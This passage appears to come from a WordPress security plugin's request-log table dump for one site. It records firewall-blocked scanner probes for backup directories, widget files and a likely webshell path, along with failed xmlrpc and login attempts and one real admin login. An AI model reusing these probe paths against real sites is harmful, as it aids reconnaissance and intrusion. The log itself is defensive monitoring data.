User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LWJsb2NrLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(135000,1700518035.220291,1700518035.182300,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/BKP',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0JLUA==\",\"category\":\"brute-force\",\"ssl\":1}'),(135018,1700547536.268193,1700547536.241700,0x00000000000000000000FFFF14DB32E5,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/network/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsvY2xvdWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(135009,1700522375.939519,1700522375.901700,0x00000000000000000000FFFFC2A9AF5D,0,403,0,0,0,'https://eckankar-colorado.org/simple.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134999,1700518035.585760,1700518035.551000,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/old-site',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L29sZC1zaXRl\",\"category\":\"brute-force\",\"ssl\":1}'),(133448,1699888598.735805,1699888598.727100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-calendar.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-calendar.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LWNhbGVuZGFyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134998,1700518035.877585,1700518035.853400,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/oldwebsite',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L29sZHdlYnNpdGU=\",\"category\":\"brute-force\",\"ssl\":1}'),(134997,1700518036.172169,1700518036.148700,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/blog',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Jsb2c=\",\"category\":\"brute-force\",\"ssl\":1}'),(133447,1699888599.074109,1699888599.064100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-categories.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-categories.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LWNhdGVnb3JpZXMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(135010,1700527781.371308,1700527781.347400,0x00000000000000000000FFFF29D8BC5C,0,403,0,0,0,'https://www.eckankar-colorado.org/simple.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134996,1700518037.262102,1700518037.238300,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/dev',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Rldg==\",\"category\":\"brute-force\",\"ssl\":1}'),(134995,1700518037.878182,1700518037.854700,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/test',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3Rlc3Q=\",\"category\":\"brute-force\",\"ssl\":1}'),(134994,1700518038.432738,1700518038.409100,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/home',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2hvbWU=\",\"category\":\"brute-force\",\"ssl\":1}'),(133446,1699888599.415824,1699888599.402700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-custom-html.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-custom-html.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LWN1c3RvbS1odG1sLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(135016,0.000000,1700541609.931351,0x00000000000000000000FFFFB752A422,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','http://ielts-fever.com/wp-login.php','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134993,1700518038.985495,1700518038.962000,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/BACKUP',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0JBQ0tVUA==\",\"category\":\"brute-force\",\"ssl\":1}'),(135017,1700547526.725576,1700547526.687300,0x00000000000000000000FFFF14DB32E5,0,403,0,0,0,'https://eckankar-colorado.org/406.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNi5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133445,1699888599.754397,1699888599.745100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-links.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-links.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LWxpbmtzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(135012,1700527762.369022,1700527762.344400,0x00000000000000000000FFFF29D8BC5C,0,403,0,0,0,'https://www.eckankar-colorado.org/wp-admin/about.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134992,1700518039.311970,1700518039.288600,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/old_files',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L29sZF9maWxlcw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134991,1700518041.260079,1700518041.236800,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/Old',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L09sZA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134990,1700518041.816234,1700518041.793000,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/demo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2RlbW8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133444,1699888600.099092,1699888600.090300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-media-audio.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-media-audio.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LW1lZGlhLWF1ZGlvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134989,1700518042.638019,1700518042.611200,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/backup',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2JhY2t1cA==\",\"category\":\"brute-force\",\"ssl\":1}'),(135015,1700538290.147651,1700538290.105900,0x00000000000000000000FFFFA484AC8F,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/index.php?pw=1','eckankar-colorado.org','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) colonel Chrome/196.3.1597.530 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgY29sb25lbCBDaHJvbWUvMTk2LjMuMTU5Ny41MzAgU2FmYXJpLzUzNy4zNg==\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134988,1700518043.977489,1700518043.954000,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/BAK',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0JBSw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133443,1699888600.436941,1699888600.428300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-media-gallery.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-media-gallery.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LW1lZGlhLWdhbGxlcnkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134979,0.000000,1700506057.172860,0x00000000000000000000FFFF225E65D6,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134980,0.000000,1700506057.400052,0x00000000000000000000FFFF225E65D6,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134981,0.000000,1700506057.649818,0x00000000000000000000FFFF225E65D6,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134982,0.000000,1700511651.447250,0x00000000000000000000FFFF4C8278C6,0,302,0,2,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','loginOK',NULL,NULL),(134983,0.000000,1700514900.230455,0x00000000000000000000FFFF4C8278C6,1,200,0,2,0,'https://eckankar-colorado.org/wp-login.php?action=logout&_wpnonce=c7b530a9da','https://eckankar-colorado.org/wp-admin/edit.php?post_type=mec_calendars','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 